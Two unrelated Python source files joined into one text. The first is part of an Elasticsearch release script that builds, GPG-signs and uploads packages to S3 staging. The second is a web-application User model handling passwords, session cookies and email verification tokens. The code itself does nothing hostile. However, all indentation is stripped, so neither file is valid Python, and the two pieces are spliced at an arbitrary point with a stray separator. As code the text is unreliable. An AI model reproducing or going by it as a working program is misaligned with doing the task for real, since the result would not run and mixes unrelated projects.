bin/plugin -Des.plugins.staging=true install shield
bin/plugin -Des.plugins.staging=true install watcher
To install the deb from an APT repo:
APT line sources.list line:
deb https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/repos/%(package_repo_version)s/debian/ stable main
To install the RPM, create a YUM file like:
/etc/yum.repos.d/elasticsearch.repo
containing:
[elasticsearch-2.x]
name=Elasticsearch repository for packages
baseurl=https://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/repos/%(package_repo_version)s/centos
gpgcheck=1
gpgkey=https://packages.elastic.co/GPG-KEY-elasticsearch
enabled=1
To smoke-test the release please run:
python3 -B ./dev-tools/smoke_test_rc.py --version %(version)s --hash %(hash)s --plugins license,shield,watcher,graph
NOTE: this script requires JAVA_HOME to point to a Java 7 Runtime
"""
# console colors
COLOR_OK = '\033[92m'
COLOR_END = '\033[0m'
COLOR_FAIL = '\033[91m'
def run(command, env_vars=None):
if env_vars:
for key, value in env_vars.items():
os.putenv(key, value)
print('*** Running: %s%s%s' % (COLOR_OK, command, COLOR_END))
if os.system(command):
raise RuntimeError(' FAILED: %s' % (command))
def ensure_checkout_is_clean():
# Make sure no local mods:
s = subprocess.check_output('git diff --shortstat', shell=True).decode('utf-8')
if len(s) > 0:
raise RuntimeError('git diff --shortstat is non-empty got:\n%s' % s)
# Make sure no untracked files:
s = subprocess.check_output('git status', shell=True).decode('utf-8', errors='replace')
if 'Untracked files:' in s:
if 'dev-tools/__pycache__/' in s:
print('*** NOTE: invoke python with -B to prevent __pycache__ directories ***')
raise RuntimeError('git status shows untracked files got:\n%s' % s)
# Make sure we have all changes from origin:
if 'is behind' in s:
raise RuntimeError('git status shows not all changes pulled from origin; try running "git pull origin" in this branch got:\n%s' % (s))
# Make sure we no local unpushed changes (this is supposed to be a clean area):
if 'is ahead' in s:
raise RuntimeError('git status shows local commits; try running "git fetch origin", "git checkout ", "git reset --hard origin/" in this branch got:\n%s' % (s))
# Reads the given file and applies the
# callback to it. If the callback changed
# a line the given file is replaced with
# the modified input.
def process_file(file_path, line_callback):
fh, abs_path = tempfile.mkstemp()
modified = False
with open(abs_path,'w', encoding='utf-8') as new_file:
with open(file_path, encoding='utf-8') as old_file:
for line in old_file:
new_line = line_callback(line)
modified = modified or (new_line != line)
new_file.write(new_line)
os.close(fh)
if modified:
#Remove original file
os.remove(file_path)
#Move new file
shutil.move(abs_path, file_path)
return True
else:
# nothing to do - just remove the tmp file
os.remove(abs_path)
return False
# Moves the Version.java file from a snapshot to a release
def remove_version_snapshot(version_file, release):
# 1.0.0.Beta1 -> 1_0_0_Beta1
release = release.replace('.', '_')
release = release.replace('-', '_')
pattern = 'new Version(V_%s_ID, true' % (release)
replacement = 'new Version(V_%s_ID, false' % (release)
def callback(line):
return line.replace(pattern, replacement)
processed = process_file(version_file, callback)
if not processed:
raise RuntimeError('failed to remove snapshot version for %s' % (release))
def rename_local_meta_files(path):
for root, _, file_names in os.walk(path):
for file_name in fnmatch.filter(file_names, 'maven-metadata-local.xml*'):
full_path = os.path.join(root, file_name)
os.rename(full_path, os.path.join(root, file_name.replace('-local', '')))
# Checks the pom.xml for the release version.
# This method fails if the pom file has no SNAPSHOT version set ie.
# if the version is already on a release version we fail.
# Returns the next version string ie. 0.90.7
def find_release_version():
with open('pom.xml', encoding='utf-8') as file:
for line in file:
match = re.search(r'<version>(.+)-SNAPSHOT</version>', line)
if match:
return match.group(1)
raise RuntimeError('Could not find release version in branch')
# Checks if the produced RPM is signed with the supplied GPG key
def ensure_rpm_is_signed(rpm, gpg_key):
rpm_check_signature_cmd = 'rpm -v -K %s | grep -qi %s' % (rpm, gpg_key)
try:
subprocess.check_output(rpm_check_signature_cmd, shell=True)
except:
raise RuntimeError('Aborting. RPM does not seem to be signed, check with: rpm -v -K %s' % rpm)
# Checks if a command exists, needed for external binaries
def check_command_exists(name, cmd):
try:
subprocess.check_output(cmd, shell=True, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError:
raise RuntimeError('Could not run command %s - please make sure it is installed and in $PATH' % (name))
def run_and_print(text, run_function):
try:
print(text, end='')
run_function()
print(COLOR_OK + 'OK' + COLOR_END)
return True
except RuntimeError:
print(COLOR_FAIL + 'NOT OK' + COLOR_END)
return False
def check_env_var(text, env_var):
try:
print(text, end='')
os.environ[env_var]
print(COLOR_OK + 'OK' + COLOR_END)
return True
except KeyError:
print(COLOR_FAIL + 'NOT OK' + COLOR_END)
return False
def check_environment_and_commandline_tools(check_only):
checks = list()
checks.append(check_env_var('Checking for AWS env configuration AWS_SECRET_KEY... ', 'AWS_SECRET_KEY'))
checks.append(check_env_var('Checking for AWS env configuration AWS_ACCESS_KEY... ', 'AWS_ACCESS_KEY'))
checks.append(run_and_print('Checking command: rpm... ', partial(check_command_exists, 'rpm', 'rpm --version')))
checks.append(run_and_print('Checking command: dpkg... ', partial(check_command_exists, 'dpkg', 'dpkg --version')))
checks.append(run_and_print('Checking command: gpg... ', partial(check_command_exists, 'gpg', 'gpg --version')))
checks.append(run_and_print('Checking command: expect... ', partial(check_command_exists, 'expect', 'expect -v')))
checks.append(run_and_print('Checking command: createrepo... ', partial(check_command_exists, 'createrepo', 'createrepo --version')))
checks.append(run_and_print('Checking command: s3cmd... ', partial(check_command_exists, 's3cmd', 's3cmd --version')))
checks.append(run_and_print('Checking command: deb-s3... ', partial(check_command_exists, 'deb-s3', 'deb-s3 -h')))
checks.append(run_and_print('Checking command: rpm-s3... ', partial(check_command_exists, 'rpm-s3', 'rpm-s3 -h')))
if check_only:
sys.exit(0)
if False in checks:
print("Exiting due to failing checks")
sys.exit(0)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='Builds and publishes a Elasticsearch Release')
parser.add_argument('--deploy-sonatype', dest='deploy_sonatype', action='store_true',
help='Installs and Deploys the release on a sonatype staging repository.')
parser.add_argument('--deploy-s3', dest='deploy_s3', action='store_true',
help='Pushes artifacts to the S3 staging area')
parser.add_argument('--deploy-s3-repos', dest='deploy_s3_repos', action='store_true',
help='Creates package repositories in S3 repo')
parser.add_argument('--no-install', dest='no_install', action='store_true',
help='Does not run "mvn install", expects this to be run already and reuses artifacts from local repo, only useful with --deploy-s3/--deploy-s3-repos, after sonatype deplomeny to ensure same artifacts')
parser.add_argument('--skip-doc-check', dest='skip_doc_check', action='store_false',
help='Skips any checks for pending documentation changes')
parser.add_argument('--skip-tests', dest='skip_tests', action='store_true',
help='Skips any test runs')
parser.add_argument('--gpg-key', dest='gpg_key', default="D88E42B4",
help='Allows you to specify a different gpg_key to be used instead of the default release key')
parser.add_argument('--bucket', '-b', dest='bucket', default="download.elasticsearch.org",
help='Allows you to specify a different s3 bucket to upload the artifacts to')
parser.add_argument('--quiet', dest='quiet', action='store_true',
help='Runs the script in quiet mode')
parser.add_argument('--check', dest='check', action='store_true',
help='Checks and reports for all requirements and then exits')
# by default, we only run mvn install and dont push anything repo
parser.set_defaults(deploy_sonatype=False)
parser.set_defaults(deploy_s3=False)
parser.set_defaults(deploy_s3_repos=False)
parser.set_defaults(no_install=False)
# other defaults
parser.set_defaults(skip_doc_check=False)
parser.set_defaults(quiet=False)
parser.set_defaults(skip_tests=False)
args = parser.parse_args()
skip_doc_check = args.skip_doc_check
gpg_key = args.gpg_key
bucket = args.bucket
deploy_sonatype = args.deploy_sonatype
deploy_s3 = args.deploy_s3
deploy_s3_repos = args.deploy_s3_repos
run_mvn_install = not args.no_install
skip_tests = args.skip_tests
check_environment_and_commandline_tools(args.check)
if not run_mvn_install and deploy_sonatype:
print('Using --no-install and --deploy-sonatype together does not work. Exiting')
sys.exit(-1)
print('*** Preparing a release candidate: ', end='')
print('deploy sonatype: %s%s%s' % (COLOR_OK if deploy_sonatype else COLOR_FAIL, 'yes' if deploy_sonatype else 'no', COLOR_END), end='')
print(', deploy s3: %s%s%s' % (COLOR_OK if deploy_s3 else COLOR_FAIL, 'yes' if deploy_s3 else 'no', COLOR_END), end='')
print(', deploy s3 repos: %s%s%s' % (COLOR_OK if deploy_s3_repos else COLOR_FAIL, 'yes' if deploy_s3_repos else 'no', COLOR_END), end='')
print('')
shortHash = subprocess.check_output('git log --pretty=format:"%h" -n 1', shell=True).decode('utf-8')
releaseDirectory = os.getenv('HOME') + '/elastic-releases'
release_version = find_release_version()
localRepo = '%s/elasticsearch-%s-%s' % (releaseDirectory, release_version, shortHash)
localRepoElasticsearch = localRepo + '/org/elasticsearch'
ensure_checkout_is_clean()
if not re.match('(\d+\.\d+)\.*',release_version):
raise RuntimeError('illegal release version format: %s' % (release_version))
package_repo_version = '%s.x' % re.match('(\d+)\.*', release_version).group(1)
print('*** Preparing release version: [%s]' % release_version)
if not skip_doc_check:
print('*** Check for pending documentation changes')
pending_files = update_reference_docs(release_version)
if pending_files:
raise RuntimeError('pending coming[%s] documentation changes found in %s' % (release_version, pending_files))
run('cd dev-tools && mvn versions:set -DnewVersion=%s -DgenerateBackupPoms=false' % (release_version))
run('cd rest-api-spec && mvn versions:set -DnewVersion=%s -DgenerateBackupPoms=false' % (release_version))
run('mvn versions:set -DnewVersion=%s -DgenerateBackupPoms=false' % (release_version))
remove_version_snapshot(VERSION_FILE, release_version)
print('*** Done removing snapshot version. DO NOT COMMIT THIS, WHEN CREATING A RELEASE CANDIDATE.')
if not os.path.exists(releaseDirectory):
os.mkdir(releaseDirectory)
if os.path.exists(localRepoElasticsearch) and run_mvn_install:
print('clean local repository %s' % localRepoElasticsearch)
shutil.rmtree(localRepoElasticsearch)
mvn_target = 'deploy' if deploy_sonatype else 'install'
tests = '-DskipTests' if skip_tests else '-Dskip.integ.tests=true'
install_command = 'mvn clean %s -Prelease %s -Dgpg.key="%s" -Dgpg.keypath="%s" -Dpackaging.rpm.rpmbuild=/usr/bin/rpmbuild -Drpm.sign=true -Dmaven.repo.local=%s -Dno.commit.pattern="\\bno(n|)commit\\b" -Dforbidden.test.signatures=""' % (mvn_target, tests, gpg_key, expanduser("~/.gnupg"), localRepo)
clean_repo_command = 'find %s -name _remote.repositories -exec rm {} \;' % (localRepoElasticsearch)
if not run_mvn_install:
print('')
print('*** By choosing --no-install we assume you ran the following commands successfully:')
print(' %s' % (install_command))
print(' 1. Remove all _remote.repositories: %s' % (clean_repo_command))
rename_metadata_files_command = 'for i in $(find %s -name "maven-metadata-local.xml*") ; do mv "$i" "${i/-local/}" ; done' % (localRepoElasticsearch)
print(' 2. Rename all maven metadata files: %s' % (rename_metadata_files_command))
else:
for cmd in [install_command, clean_repo_command]:
run(cmd)
rename_local_meta_files(localRepoElasticsearch)
rpm = '%s/distribution/rpm/elasticsearch/%s/elasticsearch-%s.rpm' % (localRepoElasticsearch, release_version, release_version)
print('Ensuring that RPM has been signed')
ensure_rpm_is_signed(rpm, gpg_key)
# repository push commands
s3cmd_sync_to_staging_bucket_cmd = 's3cmd sync -P %s s3://%s/elasticsearch/staging/%s-%s/org/' % (localRepoElasticsearch, bucket, release_version, shortHash)
s3_bucket_sync_to = '%s/elasticsearch/staging/%s-%s/repos/' % (bucket, release_version, shortHash)
s3cmd_sync_official_repo_cmd = 's3cmd sync s3://packages.elasticsearch.org/elasticsearch/%s s3://%s' % (package_repo_version, s3_bucket_sync_to)
debs3_prefix = 'elasticsearch/staging/%s-%s/repos/%s/debian' % (release_version, shortHash, package_repo_version)
debs3_upload_cmd = 'deb-s3 upload --preserve-versions %s/distribution/deb/elasticsearch/%s/elasticsearch-%s.deb -b %s --prefix %s --sign %s --arch amd64' % (localRepoElasticsearch, release_version, release_version, bucket, debs3_prefix, gpg_key)
debs3_list_cmd = 'deb-s3 list -b %s --prefix %s' % (bucket, debs3_prefix)
debs3_verify_cmd = 'deb-s3 verify -b %s --prefix %s' % (bucket, debs3_prefix)
rpms3_prefix = 'elasticsearch/staging/%s-%s/repos/%s/centos' % (release_version, shortHash, package_repo_version)
# external-1 is the alias name for the us-east-1 region. This is used by rpm-s3 to construct the hostname
rpms3_upload_cmd = 'rpm-s3 -v -b %s -p %s --sign --visibility public-read -k 100 %s -r external-1' % (bucket, rpms3_prefix, rpm)
if deploy_s3:
run(s3cmd_sync_to_staging_bucket_cmd)
else:
print('')
print('*** To push a release candidate to s3 run: ')
print(' 1. Sync %s into S3 bucket' % (localRepoElasticsearch))
print (' %s' % (s3cmd_sync_to_staging_bucket_cmd))
if deploy_s3_repos:
print('*** Syncing official package repository into staging s3 bucket')
run(s3cmd_sync_official_repo_cmd)
print('*** Uploading debian package (you will be prompted for the passphrase!)')
run(debs3_upload_cmd)
run(debs3_list_cmd)
run(debs3_verify_cmd)
print('*** Uploading rpm package (you will be prompted for the passphrase!)')
run(rpms3_upload_cmd)
else:
print('*** To create repositories on S3 run:')
print(' 1. Sync existing repo into staging: %s' % s3cmd_sync_official_repo_cmd)
print(' 2. Upload debian package (and sign it): %s' % debs3_upload_cmd)
print(' 3. List all debian packages: %s' % debs3_list_cmd)
print(' 4. Verify debian packages: %s' % debs3_verify_cmd)
print(' 5. Upload RPM: %s' % rpms3_upload_cmd)
print('')
print('NOTE: the above mvn command will promt you several times for the GPG passphrase of the key you specified you can alternatively pass it via -Dgpg.passphrase=yourPassPhrase')
print(' since RPM signing doesn\'t support gpg-agents the recommended way to set the password is to add a release profile to your settings.xml:')
print("""
<profiles>
<profile>
<id>release</id>
<properties>
<gpg.passphrase>YourPasswordGoesHere</gpg.passphrase>
</properties>
</profile>
</profiles>
""")
print('NOTE: Running s3cmd might require you to create a config file with your credentials, if the s3cmd does not support suppliying them via the command line!')
print('*** Once the release is deployed and published send out the following mail to dev@elastic.co:')
string_format_dict = {'version' : release_version, 'hash': shortHash, 'package_repo_version' : package_repo_version, 'bucket': bucket}
print(MAIL_TEMPLATE % string_format_dict)
print('')
print('You can verify that pushing to the staging repository pushed all the artifacts by running (log into sonatype to find out the correct id):')
print(' python -B dev-tools/validate-maven-repository.py %s https://oss.sonatype.org/service/local/repositories/orgelasticsearch-IDTOFINDOUT/content/org/elasticsearch ' %(localRepoElasticsearch))
print('')
print('To publish the release and the repo on S3 execute the following commands:')
print(' s3cmd cp --recursive s3://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/repos/%(package_repo_version)s/ s3://packages.elasticsearch.org/elasticsearch/%(package_repo_version)s' % string_format_dict)
print(' s3cmd cp --recursive s3://%(bucket)s/elasticsearch/staging/%(version)s-%(hash)s/org/ s3://%(bucket)s/elasticsearch/release/org' % string_format_dict)
print('Now go ahead and tag the release:')
print(' git tag -a v%(version)s %(hash)s' % string_format_dict)
print(' git push origin v%(version)s' % string_format_dict )
| |
# -*- coding: utf-8 -*-
import re
import logging
import urlparse
import itertools
import datetime as dt
import bson
import pytz
import itsdangerous
from modularodm import fields, Q
from modularodm.validators import URLValidator
from modularodm.exceptions import NoResultsFound
from modularodm.exceptions import ValidationError, ValidationValueError
import framework
from framework import analytics
from framework.sessions import session
from framework.auth import exceptions, utils, signals
from framework.sentry import log_exception
from framework.addons import AddonModelMixin
from framework.sessions.model import Session
from framework.sessions.utils import remove_sessions_for_user
from framework.exceptions import PermissionsError
from framework.guid.model import GuidStoredObject
from framework.bcrypt import generate_password_hash, check_password_hash
from framework.auth.exceptions import ChangePasswordError, ExpiredTokenError
from website import mails, settings, filters, security
name_formatters = {
'long': lambda user: user.fullname,
'surname': lambda user: user.family_name if user.family_name else user.fullname,
'initials': lambda user: u'{surname}, {initial}.'.format(
surname=user.family_name,
initial=user.given_name_initial,
),
}
logger = logging.getLogger(__name__)
# Hide implementation of token generation
def generate_confirm_token():
return security.random_string(30)
def generate_claim_token():
return security.random_string(30)
def string_required(value):
if value is None or value == '':
raise ValidationValueError('Value must not be empty.')
def validate_history_item(item):
string_required(item.get('institution'))
startMonth = item.get('startMonth')
startYear = item.get('startYear')
endMonth = item.get('endMonth')
endYear = item.get('endYear')
validate_year(startYear)
validate_year(endYear)
if startYear and endYear:
if endYear < startYear:
raise ValidationValueError('End date must be later than start date.')
elif endYear == startYear:
if endMonth and startMonth and endMonth < startMonth:
raise ValidationValueError('End date must be later than start date.')
def validate_year(item):
if item:
try:
int(item)
except ValueError:
raise ValidationValueError('Please enter a valid year.')
else:
if len(item) != 4:
raise ValidationValueError('Please enter a valid year.')
validate_url = URLValidator()
def validate_personal_site(value):
if value:
try:
validate_url(value)
except ValidationError:
# Reraise with a better message
raise ValidationError('Invalid personal URL.')
def validate_social(value):
validate_personal_site(value.get('personal'))
# TODO - rename to _get_current_user_from_session /HRYBACKI
def _get_current_user():
uid = session._get_current_object() and session.data.get('auth_user_id')
return User.load(uid)
# TODO: This should be a class method of User?
def get_user(email=None, password=None, verification_key=None):
"""Get an instance of User matching the provided params.
:return: The instance of User requested
:rtype: User or None
"""
# tag: database
if password and not email:
raise AssertionError("If a password is provided, an email must also "
"be provided.")
query_list = []
if email:
email = email.strip().lower()
query_list.append(Q('emails', 'eq', email) | Q('username', 'eq', email))
if password:
password = password.strip()
try:
query = query_list[0]
for query_part in query_list[1:]:
query = query & query_part
user = User.find_one(query)
except Exception as err:
logger.error(err)
user = None
if user and not user.check_password(password):
return False
return user
if verification_key:
query_list.append(Q('verification_key', 'eq', verification_key))
try:
query = query_list[0]
for query_part in query_list[1:]:
query = query & query_part
user = User.find_one(query)
return user
except Exception as err:
logger.error(err)
return None
class Auth(object):
def __init__(self, user=None, api_node=None,
private_key=None):
self.user = user
self.api_node = api_node
self.private_key = private_key
def __repr__(self):
return ('<Auth(user="{self.user}", '
'private_key={self.private_key})>').format(self=self)
@property
def logged_in(self):
return self.user is not None
@classmethod
def from_kwargs(cls, request_args, kwargs):
user = request_args.get('user') or kwargs.get('user') or _get_current_user()
private_key = request_args.get('view_only')
return cls(
user=user,
private_key=private_key,
)
class User(GuidStoredObject, AddonModelMixin):
# Node fields that trigger an update to the search engine on save
SEARCH_UPDATE_FIELDS = {
'fullname',
'given_name',
'middle_names',
'family_name',
'suffix',
'merged_by',
'date_disabled',
'date_confirmed',
'jobs',
'schools',
'social',
}
# TODO: Add SEARCH_UPDATE_NODE_FIELDS, for fields that should trigger a
# search update for all nodes to which the user is a contributor.
SOCIAL_FIELDS = {
'orcid': u'http://orcid.com/{}',
'github': u'http://github.com/{}',
'scholar': u'http://scholar.google.com/citation?user={}',
'twitter': u'http://twitter.com/{}',
'personal': u'{}',
'linkedIn': u'https://www.linkedin.com/profile/view?id={}',
'impactStory': u'https://impactstory.org/{}',
'researcherId': u'http://researcherid.com/rid/{}',
}
# This is a GuidStoredObject, so this will be a GUID.
_id = fields.StringField(primary=True)
# The primary email address for the account.
# This value is unique, but multiple "None" records exist for:
# * unregistered contributors where an email address was not provided.
# TODO: Update mailchimp subscription on username change in user.save()
username = fields.StringField(required=False, unique=True, index=True)
# Hashed. Use `User.set_password` and `User.check_password`
password = fields.StringField()
fullname = fields.StringField(required=True, validate=string_required)
# user has taken action to register the account
is_registered = fields.BooleanField(index=True)
# user has claimed the account
# TODO: This should be retired - it always reflects is_registered.
# While a few entries exist where this is not the case, they appear to be
# the result of a bug, as they were all created over a small time span.
is_claimed = fields.BooleanField(default=False, index=True)
# a list of strings - for internal use
system_tags = fields.StringField(list=True)
# security emails that have been sent
# TODO: This should be removed and/or merged with system_tags
security_messages = fields.DictionaryField()
# Format: {
# <message label>: <datetime>
# ...
# }
# user was invited (as opposed to registered unprompted)
is_invited = fields.BooleanField(default=False, index=True)
# Per-project unclaimed user data:
# TODO: add validation
unclaimed_records = fields.DictionaryField(required=False)
# Format: {
# <project_id>: {
# 'name': <name that referrer provided>,
# 'referrer_id': <user ID of referrer>,
# 'token': <token used for verification urls>,
# 'email': <email the referrer provided or None>,
# 'claimer_email': <email the claimer entered or None>,
# 'last_sent': <timestamp of last email sent to referrer or None>
# }
# ...
# }
# Time of last sent notification email to newly added contributors
# Format : {
# <project_id>: {
# 'last_sent': time.time()
# }
# ...
# }
contributor_added_email_records = fields.DictionaryField(default=dict)
# The user into which this account was merged
merged_by = fields.ForeignField('user',
default=None,
backref='merged',
index=True)
# verification key used for resetting password
verification_key = fields.StringField()
# confirmed emails
# emails should be stripped of whitespace and lower-cased before appending
# TODO: Add validator to ensure an email address only exists once across
# all User's email lists
emails = fields.StringField(list=True)
# email verification tokens
# see also ``unconfirmed_emails``
email_verifications = fields.DictionaryField(default=dict)
# Format: {
# <token> : {'email': <email address>,
# 'expiration': <datetime>}
# }
# email lists to which the user has chosen a subscription setting
mailing_lists = fields.DictionaryField()
# Format: {
# 'list1': True,
# 'list2: False,
# ...
# }
# the date this user was registered
# TODO: consider removal - this can be derived from date_registered
date_registered = fields.DateTimeField(auto_now_add=dt.datetime.utcnow,
index=True)
# watched nodes are stored via a list of WatchConfigs
watched = fields.ForeignField("WatchConfig", list=True, backref="watched")
# list of users recently added to nodes as a contributor
recently_added = fields.ForeignField("user", list=True, backref="recently_added")
# Attached external accounts (OAuth)
external_accounts = fields.ForeignField("externalaccount",
list=True,
backref="connected")
# CSL names
given_name = fields.StringField()
middle_names = fields.StringField()
family_name = fields.StringField()
suffix = fields.StringField()
# Employment history
jobs = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'title': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing: <boolean>
# }
# Educational history
schools = fields.DictionaryField(list=True, validate=validate_history_item)
# Format: {
# 'degree': <position or job title>,
# 'institution': <institution or organization>,
# 'department': <department>,
# 'location': <location>,
# 'startMonth': <start month>,
# 'startYear': <start year>,
# 'endMonth': <end month>,
# 'endYear': <end year>,
# 'ongoing: <boolean>
# }
# Social links
social = fields.DictionaryField(validate=validate_social)
# Format: {
# 'personal': <personal site>,
# 'twitter': <twitter id>,
# }
# hashed password used to authenticate to Piwik
piwik_token = fields.StringField()
# date the user last logged in via the web interface
date_last_login = fields.DateTimeField()
# date the user first successfully confirmed an email address
date_confirmed = fields.DateTimeField(index=True)
# When the user was disabled.
date_disabled = fields.DateTimeField(index=True)
# when comments for a node were last viewed
comments_viewed_timestamp = fields.DictionaryField()
# Format: {
# 'node_id': 'timestamp'
# }
# timezone for user's locale (e.g. 'America/New_York')
timezone = fields.StringField(default='Etc/UTC')
# user language and locale data (e.g. 'en_US')
locale = fields.StringField(default='en_US')
_meta = {'optimistic': True}
def __repr__(self):
return '<User({0!r}) with id {1!r}>'.format(self.username, self._id)
def __str__(self):
return self.fullname.encode('ascii', 'replace')
__unicode__ = __str__
# For compatibility with Django auth
@property
def pk(self):
return self._id
@property
def email(self):
return self.username
def is_authenticated(self): # Needed for django compat
return True
def is_anonymous(self):
return False
@property
def absolute_api_v2_url(self):
from api.base.utils import absolute_reverse # Avoid circular dependency
return absolute_reverse('users:user-detail', kwargs={'user_id': self.pk})
# used by django and DRF
def get_absolute_url(self):
return self.absolute_api_v2_url
@classmethod
def create_unregistered(cls, fullname, email=None):
"""Create a new unregistered user.
"""
user = cls(
username=email,
fullname=fullname,
is_invited=True,
is_registered=False,
)
user.update_guessed_names()
return user
@classmethod
def create(cls, username, password, fullname):
user = cls(
username=username,
fullname=fullname,
)
user.update_guessed_names()
user.set_password(password)
return user
@classmethod
def create_unconfirmed(cls, username, password, fullname, do_confirm=True):
"""Create a new user who has begun registration but needs to verify
their primary email address (username).
"""
user = cls.create(username, password, fullname)
user.add_unconfirmed_email(username)
user.is_registered = False
return user
@classmethod
def create_confirmed(cls, username, password, fullname):
user = cls.create(username, password, fullname)
user.is_registered = True
user.is_claimed = True
user.date_confirmed = user.date_registered
return user
@classmethod
def from_cookie(cls, cookie, secret=None):
"""Attempt to load a user from their signed cookie
:returns: None if a user cannot be loaded else User
"""
if not cookie:
return None
secret = secret or settings.SECRET_KEY
try:
token = itsdangerous.Signer(secret).unsign(cookie)
except itsdangerous.BadSignature:
return None
user_session = Session.load(token)
if user_session is None:
return None
return cls.load(user_session.data.get('auth_user_id'))
def get_or_create_cookie(self, secret=None):
"""Find the cookie for the given user
Create a new session if no cookie is found
:param str secret: The key to sign the cookie with
:returns: The signed cookie
"""
secret = secret or settings.SECRET_KEY
sessions = Session.find(
Q('data.auth_user_id', 'eq', self._id)
).sort(
'-date_modified'
).limit(1)
if sessions.count() > 0:
user_session = sessions[0]
else:
user_session = Session(data={
'auth_user_id': self._id,
'auth_user_username': self.username,
'auth_user_fullname': self.fullname,
})
user_session.save()
signer = itsdangerous.Signer(secret)
return signer.sign(user_session._id)
def update_guessed_names(self):
"""Updates the CSL name fields inferred from the the full name.
"""
parsed = utils.impute_names(self.fullname)
self.given_name = parsed['given']
self.middle_names = parsed['middle']
self.family_name = parsed['family']
self.suffix = parsed['suffix']
def register(self, username, password=None):
"""Registers the user.
"""
self.username = username
if password:
self.set_password(password)
if username not in self.emails:
self.emails.append(username)
self.is_registered = True
self.is_claimed = True
self.date_confirmed = dt.datetime.utcnow()
self.update_search()
self.update_search_nodes()
# Emit signal that a user has confirmed
signals.user_confirmed.send(self)
return self
def add_unclaimed_record(self, node, referrer, given_name, email=None):
"""Add a new project entry in the unclaimed records dictionary.
:param Node node: Node this unclaimed user was added to.
:param User referrer: User who referred this user.
:param str given_name: The full name that the referrer gave for this user.
:param str email: The given email address.
:returns: The added record
"""
if not node.can_edit(user=referrer):
raise PermissionsError('Referrer does not have permission to add a contributor '
'to project {0}'.format(node._primary_key))
project_id = node._primary_key
referrer_id = referrer._primary_key
if email:
clean_email = email.lower().strip()
else:
clean_email = None
record = {
'name': given_name,
'referrer_id': referrer_id,
'token': generate_confirm_token(),
'email': clean_email
}
self.unclaimed_records[project_id] = record
return record
def display_full_name(self, node=None):
"""Return the full name , as it would display in a contributor list for a
given node.
NOTE: Unclaimed users may have a different name for different nodes.
"""
if node:
unclaimed_data = self.unclaimed_records.get(node._primary_key, None)
if unclaimed_data:
return unclaimed_data['name']
return self.fullname
@property
def is_active(self):
"""Returns True if the user is active. The user must have activated
their account, must not be deleted, suspended, etc.
:return: bool
"""
return (self.is_registered and
self.password is not None and
not self.is_merged and
not self.is_disabled and
self.is_confirmed)
def get_unclaimed_record(self, project_id):
"""Get an unclaimed record for a given project_id.
:raises: ValueError if there is no record for the given project.
"""
try:
return self.unclaimed_records[project_id]
except KeyError: # reraise as ValueError
raise ValueError('No unclaimed record for user {self._id} on node {project_id}'
.format(**locals()))
def get_claim_url(self, project_id, external=False):
"""Return the URL that an unclaimed user should use to claim their
account. Return ``None`` if there is no unclaimed_record for the given
project ID.
:param project_id: The project ID for the unclaimed record
:raises: ValueError if a record doesn't exist for the given project ID
:rtype: dict
:returns: The unclaimed record for the project
"""
uid = self._primary_key
base_url = settings.DOMAIN if external else '/'
unclaimed_record = self.get_unclaimed_record(project_id)
token = unclaimed_record['token']
return '{base_url}user/{uid}/{project_id}/claim/?token={token}'\
.format(**locals())
def set_password(self, raw_password):
"""Set the password for this user to the hash of ``raw_password``."""
self.password = generate_password_hash(raw_password)
def check_password(self, raw_password):
"""Return a boolean of whether ``raw_password`` was correct."""
if not self.password or not raw_password:
return False
return check_password_hash(self.password, raw_password)
@property
def csl_given_name(self):
parts = [self.given_name]
if self.middle_names:
parts.extend(each[0] for each in re.split(r'\s+', self.middle_names))
return ' '.join(parts)
@property
def csl_name(self):
return {
'family': self.family_name,
'given': self.csl_given_name,
}
# TODO: This should not be on the User object.
def change_password(self, raw_old_password, raw_new_password, raw_confirm_password):
"""Change the password for this user to the hash of ``raw_new_password``."""
raw_old_password = (raw_old_password or '').strip()
raw_new_password = (raw_new_password or '').strip()
raw_confirm_password = (raw_confirm_password or '').strip()
issues = []
if not self.check_password(raw_old_password):
issues.append('Old password is invalid')
elif raw_old_password == raw_new_password:
issues.append('Password cannot be the same')
if not raw_old_password or not raw_new_password or not raw_confirm_password:
issues.append('Passwords cannot be blank')
elif len(raw_new_password) < 6:
issues.append('Password should be at least six characters')
elif len(raw_new_password) > 256:
issues.append('Password should not be longer than 256 characters')
if raw_new_password != raw_confirm_password:
issues.append('Password does not match the confirmation')
if issues:
raise ChangePasswordError(issues)
self.set_password(raw_new_password)
def _set_email_token_expiration(self, token, expiration=None):
"""Set the expiration date for given email token.
:param str token: The email token to set the expiration for.
:param datetime expiration: Datetime at which to expire the token. If ``None``, the
token will expire after ``settings.EMAIL_TOKEN_EXPIRATION`` hours. This is only
used for testing purposes.
"""
expiration = expiration or (dt.datetime.utcnow() + dt.timedelta(hours=settings.EMAIL_TOKEN_EXPIRATION))
self.email_verifications[token]['expiration'] = expiration
return expiration
def add_unconfirmed_email(self, email, expiration=None):
"""Add an email verification token for a given email."""
# TODO: This is technically not compliant with RFC 822, which requires
# that case be preserved in the "local-part" of an address. From
# a practical standpoint, the vast majority of email servers do
# not preserve case.
# ref: https://tools.ietf.org/html/rfc822#section-6
email = email.lower().strip()
if email in self.emails:
raise ValueError("Email already confirmed to this user.")
utils.validate_email(email)
# If the unconfirmed email is already present, refresh the token
if email in self.unconfirmed_emails:
self.remove_unconfirmed_email(email)
token = generate_confirm_token()
# handle when email_verifications is None
if not self.email_verifications:
self.email_verifications = {}
self.email_verifications[token] = {'email': email}
self._set_email_token_expiration(token, expiration=expiration)
return token
def remove_unconfirmed_email(self, email):
"""Remove an unconfirmed email addresses and their tokens."""
for token, value in self.email_verifications.iteritems():
if value.get('email') == email:
del self.email_verifications[token]
return True
return False
def remove_email(self, email):
"""Remove a confirmed email"""
if email == self.username:
raise PermissionsError("Can't remove primary email")
if email in self.emails:
self.emails.remove(email)
signals.user_email_removed.send(self, email=email)
@signals.user_email_removed.connect
def _send_email_removal_confirmations(self, email):
mails.send_mail(to_addr=self.username,
mail=mails.REMOVED_EMAIL,
user=self,
removed_email=email,
security_addr='alternate email address ({})'.format(email))
